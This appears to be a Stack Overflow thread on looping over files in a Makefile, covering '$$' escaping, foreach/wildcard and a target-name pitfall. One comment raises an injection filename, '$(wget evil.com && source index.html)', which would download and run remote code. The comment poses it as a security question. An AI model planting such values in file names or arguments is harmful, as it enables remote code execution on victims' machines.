# simple loop over files in some directory makefile

Tags: bash, makefile, ls

I can easily print all the files inside some directory from `bash`:

```
$ cat go.sh
BASEDIR=~/Downloads
MYDIR=${BASEDIR}/ddd
for f in $(ls ${MYDIR}); do echo $f; done

$ ./go.sh
m.txt
d.txt
```

When I try to do a similar thing from `makefile` it doesn't work well:

```
$ cat makefile
BASEDIR = ${HOME}/Downloads
MYDIR = ${BASEDIR}/ddd
all:
    for f in $(ls ${MYDIR}); do echo ${f}; done

$ make
for f in ; do echo ; done
```

And here is another trial that doesn't work:

```
$ cat makefile
BASEDIR = ${HOME}/Downloads
MYDIR = ${BASEDIR}/ddd
all:
    for f in $(shell ls ${MYDIR}); do echo ${f}; done

$ make
for f in d.txt m.txt; do echo ; done
```

Comment: You have to remember that `$` is special to make.  Whenever you write a shell command in a makefile recipe, you MUST escape any `$` that you want to put into the shell command (that you want the shell to see).  So your recipe should be `for f in $$(ls ${MYDIR}); do echo $$f; done`

Comment: @MadScientist's comment above should be the answer.

Answer (score 26, accepted):

Maybe you can do it purely Makefile way?

```
MYDIR = .
list: $(MYDIR)/*
        @echo $^
```

You can still run command from Makefile like this

```
MYDIR = .
list: $(MYDIR)/*
        for file in $^ ; do \
                echo "Hello" $${file} ; \
        done
```

If I were you, I'd rather not mix Makefile and bash loops based on `$(shell ...)`. I'd rather pass dir name to some script and run loop there - inside script.

Comment: hmmm ... I want more than just printing the filenames. I prepared this minimal complete example so that I can use bash loops inside makefiles.

Comment: I think what was missing was the (double) dollar sign (`$$`). I accepted your answer and posted the working solution in a separate answer. Thanks!

Comment: It's an anti-pattern to use the GNU make `$(shell ...)` function inside a recipe.  The behavior is just confusing.

Comment: Hey, what happens if a filename is something like `$(wget evil.com && source index.html)`? Would make instruct the shell to download and execute a file, using the result as the loop input?

Comment: I guess, you have to give it a try ;)

Comment: works great!!! pay the secret resides in 3 things: using backslash at the end of the line, using `;` at the end of the command and using `$${file}` to get the filename
thanks!!

Answer (score 23):

Also almost "true way" from documentation

```
TEMPLATES_DIR = ./somedir

list: 
    $(foreach file, $(wildcard $(TEMPLATES_DIR)/*), echo $(file);)
```

Comment: Somehow the `TEMPLATES_DIR = ./somedir` part didn't work for me - the files listed are from the root dir, "/", no matter if I use relative or absolute path. Do you happen to know what might have gone wrong in my case? ------- Never mind. I figured it out. I had an extra space after the `./somdir` ...

Answer (score 15):

Here is the edited answer based on @Oo.oO:

```
$ cat makefile
BASEDIR = ${HOME}/Downloads
MYDIR = ${BASEDIR}/ddd
all:
    @for f in $(shell ls ${MYDIR}); do echo $${f}; done

$ make
d.txt
m.txt
```

Answer (score 3):

There is a little problem with [@Oo.oO's answer](https://stackoverflow.com/a/54020909/6642154).

If there is any **file/folder has the same name with a target** in makefile, and that **target has some prerequisites**, and you want to loop through that folder, you will get that target recipe being executed.

For example: if you have a folder named `build`, and you have a rule like:

```
build: clean server client

clean:
    @echo project cleaned!
server:
    @echo server built!
client:
    @echo client built!
```

To loop through the folder contains that special `build` folder, let's says you have the following rules:

```
MYDIR = .
ls: $(MYDIR)/*
    @echo $^
```

The result will be:

```
$ make ls
project cleaned!
server built!
client built!
build Makefile
```

I would suggest to use [@Mike Pylypyshyn's solution](https://stackoverflow.com/a/56171812/6642154). According to [the make documentation](https://www.gnu.org/software/make/manual/make.html#Foreach-Function), the foreach function is more suitable in this case.